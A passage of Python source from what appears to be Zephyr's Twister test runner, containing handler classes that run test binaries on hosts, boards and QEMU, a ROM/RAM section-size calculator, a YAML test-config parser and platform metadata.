if harness_state == harness_state_pass and \
self.instance.reason == instance_reason_unknown and \
harness_testcase_result_skip in self.instance.results.values():
self.instance.reason = "ztest skip"
def _verify_ztest_suite_name(self, harness_state, detected_suite_names, handler_time):
"""
If test suite names was found in test's C source code, then verify if
detected suite names from output correspond to expected suite names
(and not in reverse).
"""
expected_suite_names = self.instance.testcase.ztest_suite_names
if not expected_suite_names or \
not harness_state == "passed":
return
if not detected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
for detected_suite_name in detected_suite_names:
if detected_suite_name not in expected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
break
def _missing_suite_name(self, expected_suite_names, handler_time):
"""
Change result of performed test if problem with missing or unpropper
suite name was occurred.
"""
self.set_state("failed", handler_time)
for k in self.instance.testcase.cases:
self.instance.results[k] = "FAIL"
self.instance.reason = f"Testsuite mismatch"
logger.debug("Test suite names were not printed or some of them in " \
"output do not correspond with expected: %s",
str(expected_suite_names))
def _final_handle_actions(self, harness, handler_time):
self._set_skip_reason(harness.state)
# only for Ztest tests:
harness_class_name = type(harness).__name__
if self.suite_name_check and harness_class_name == "Test":
self._verify_ztest_suite_name(harness.state, harness.detected_suite_names, handler_time)
if not harness.matched_run_id and harness.run_id_exists:
self.set_state("failed", handler_time)
self.instance.reason = "RunID mismatch"
for k in self.instance.testcase.cases:
self.instance.results[k] = "FAIL"
self.record(harness)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind:
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log",
"--track-origins=yes",
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
if run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
else:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.add_missing_testscases(harness)
self._final_handle_actions(harness, handler_time)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
# Set capture_coverage to True to indicate that right after
# test results we should get coverage data, otherwise we exit
# from the test.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for d in self.suite.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or (d.serial is None and d.serial_pty is None):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.suite.duts:
if d.serial == serial or d.serial_pty:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, stderr = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
if proc.returncode != 0:
logger.error(f"Custom script failure: {stderr.decode(errors='ignore')}")
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.suite.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug(f"Using serial device {serial_device} @ {hardware.baud} baud")
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--dev-id")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
elif runner == "stm32cubeprogrammer":
command.append("--tool-opt=sn=%s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=hardware.baud,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
# ignore unencodable unicode chars
logger.debug(stdout.decode(errors = "ignore"))
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
os.write(write_pipe, b'x') # halt the thread
out_state = "flash_error"
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state in ["timeout", "flash_error"]:
self.add_missing_testscases(harness)
if out_state == "timeout":
self.instance.reason = "Timeout"
elif out_state == "flash_error":
self.instance.reason = "Flash error"
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.results = harness.tests
# sometimes a test instance hasn't been executed successfully with an
# empty dictionary results, in order to include it into final report,
# so fill the results as BLOCK
if self.instance.results == {}:
for k in self.instance.testcase.cases:
self.instance.results[k] = 'BLOCK'
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
self._final_handle_actions(harness, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testcase.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process execution time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
#there's possibility we polled nothing because
#of not enough CPU time scheduled by host for
#QEMU process during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
if harness.is_pytest:
harness.handle(None)
out_state = harness.state
break
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
if harness.is_pytest:
harness.pytest_run(logfile)
out_state = harness.state
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# twister to judge testing result by console output
is_timeout = True
self.terminate(proc)
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join(0)
if self.thread.is_alive():
logger.debug("Timed out while monitoring QEMU output")
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.set_state("failed", 0)
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
self.add_missing_testscases(harness)
self._final_handle_actions(harness, 0)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.timeout_multiplier = 1.0
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.timeout_multiplier = testing.get("timeout_multiplier", 1.0)
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class ScanPathResult:
"""Result of the TestCase.scan_path function call.
Attributes:
matches A list of test cases
warnings A string containing one or more
warnings to display
has_registered_test_suites Whether or not the path contained any
calls to the ztest_register_test_suite
macro.
has_run_registered_test_suites Whether or not the path contained at
least one call to
ztest_run_registered_test_suites.
has_test_main Whether or not the path contains a
definition of test_main(void)
ztest_suite_names Names of found ztest suites
"""
def __init__(self,
matches: List[str] = None,
warnings: str = None,
has_registered_test_suites: bool = False,
has_run_registered_test_suites: bool = False,
has_test_main: bool = False,
ztest_suite_names: List[str] = []):
self.matches = matches
self.warnings = warnings
self.has_registered_test_suites = has_registered_test_suites
self.has_run_registered_test_suites = has_run_registered_test_suites
self.has_test_main = has_test_main
self.ztest_suite_names = ztest_suite_names
def __eq__(self, other):
if not isinstance(other, ScanPathResult):
return False
return (sorted(self.matches) == sorted(other.matches) and
self.warnings == other.warnings and
(self.has_registered_test_suites ==
other.has_registered_test_suites) and
(self.has_run_registered_test_suites ==
other.has_run_registered_test_suites) and
self.has_test_main == other.has_test_main and
(sorted(self.ztest_suite_names) ==
sorted(other.ztest_suite_names)))
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.toolchain_exclude = None
self.toolchain_allow = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
self.ztest_suite_names = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise TwisterException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
def scan_file(self, inf_name):
regular_suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
